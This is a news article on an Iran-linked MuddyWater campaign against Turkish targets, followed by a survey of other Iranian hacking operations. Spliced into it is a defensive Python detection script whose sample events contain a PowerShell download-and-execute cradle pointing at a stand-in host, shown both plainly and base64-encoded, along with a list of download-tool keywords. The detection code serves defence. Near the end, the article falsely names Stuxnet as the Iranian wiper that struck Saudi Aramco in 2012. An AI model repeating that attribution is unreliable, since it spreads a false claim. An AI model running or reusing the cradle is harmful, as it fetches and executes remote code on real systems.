Malicious campaign targeting Turkey found to be connected with Iran
In the past five years, security experts have repeatedly highlighted Iran as a key threat actor behind a range of attacks. Iranian hackers have executed various malicious operations to achieve the objectives of the state, directly or indirectly, and this continues to be the case.
The most recent such operation has been exposed by Cisco Talos. The intelligence group discovered a new malicious campaign targeting high-profile entities in Turkey. According to the security researchers, MuddyWater (also known as Mercury or Static Kitten), an advanced persistent threat (APT) group with ties to Iran’s Ministry of Intelligence and Security (MOIS), has been linked to campaigns against private organizations and government personnel in Turkey.
The analysis by the security researchers indicates that the targeted campaigns used malicious PDFs, XLS files, and Windows executables to deploy PowerShell-based downloaders that act as the primary foothold into the targeted organizations' networks.
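A defender reading the description above would want a concrete check for that initial-foothold pattern. The following is an added example, not code from Talos or from the campaign: it scans constructed, simplified process-creation events (a Sysmon-like dict shape, assumed here) for a document reader such as Excel or Acrobat Reader spawning PowerShell with a download cradle, including a cradle hidden behind `-EncodedCommand`.

```python
import base64
import re
# Parent processes a PDF/XLS lure would typically run under (assumed list).
DOCUMENT_READERS = {"excel.exe", "winword.exe", "acrord32.exe", "acrobat.exe"}
POWERSHELL_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob (UTF-16LE script).
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmdline):
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return ""

def is_suspicious(event):
    """Document reader -> PowerShell whose command line (plain or decoded) has a cradle."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent not in DOCUMENT_READERS:
        return False
    if not POWERSHELL_RE.search(event.get("Image", "")):
        return False
    cmd = event.get("CommandLine", "")
    return bool(DOWNLOAD_RE.search(cmd + " " + decode_encoded_command(cmd)))

def find_suspicious(events):
    return [e["EventId"] for e in events if is_suspicious(e)]

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/s.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden " + _CRADLE},
    {"EventId": 2, "ParentImage": r"C:\Program Files\Adobe\Acrobat\AcroRd32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ep bypass -enc " + _ENC},
    {"EventId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"EventId": 4, "ParentImage": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]
```

Running `find_suspicious(SAMPLE_EVENTS)` flags events 1 and 2 only; the explorer-spawned PowerShell and the Excel-spawned cmd.exe are left alone, so the rule stays narrow enough for production triage.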
The APT group has been found to be operational since 2017 and has been linked to various attacks in the US, Israel, Europe, and the Middle East. The group's malicious activities have been acknowledged globally; US Cyber Command warned that MuddyWater is one of many groups “conducting Iranian intelligence activities.”
Iran has also deployed other methods of extracting intelligence about its rivals to meet its state objectives.
Back in October 2021, two Iranian nationals employed by Emennet Pasargad were charged with computer intrusion, computer fraud, voter intimidation, interstate threats, and conspiracy offenses for their suspected participation in an operation aimed at influencing and interfering with the 2020 US presidential election. The FBI issued an alert detailing the tools, techniques, and tactics of the Iranian group, giving US organizations guidance to defend against Iran’s malicious cyber activities.
Last year the Iranian hacking group “Lyceum” targeted Israel, Saudi Arabia, Morocco, Tunisia, and other countries in Africa. The attack methods used in the campaign resembled tactics previously attributed to hacking operations connected with the DNSpionage group.
In July 2021, the Cybereason Nocturnus and Incident Response team responded to the Iranian-associated Operation Ghostshell, a highly targeted cyber-surveillance campaign aimed at the aerospace and telecommunications industries, mainly in the Middle East, with additional victims in the U.S., Russia, and Europe.
Iran was also behind the 2012 Stuxnet virus spread that hit Saudi Aramco (Saudi Arabian Oil Co) and RasGas (the Qatari natural gas producer). The virus wiped hard drives and even displayed a picture of a burning US flag on computer screens. In response, Saudi Aramco had to shut down its network and destroyed over 30,000 computers.
Despite repeated exposures of state-sponsored intelligence extraction campaigns by Iran, the country has not toned down its offensive operations in the region or globally. Trends suggest that it plans to continue such operations in the future with the same intensity, given its growing self-sufficient cyber offensive capabilities.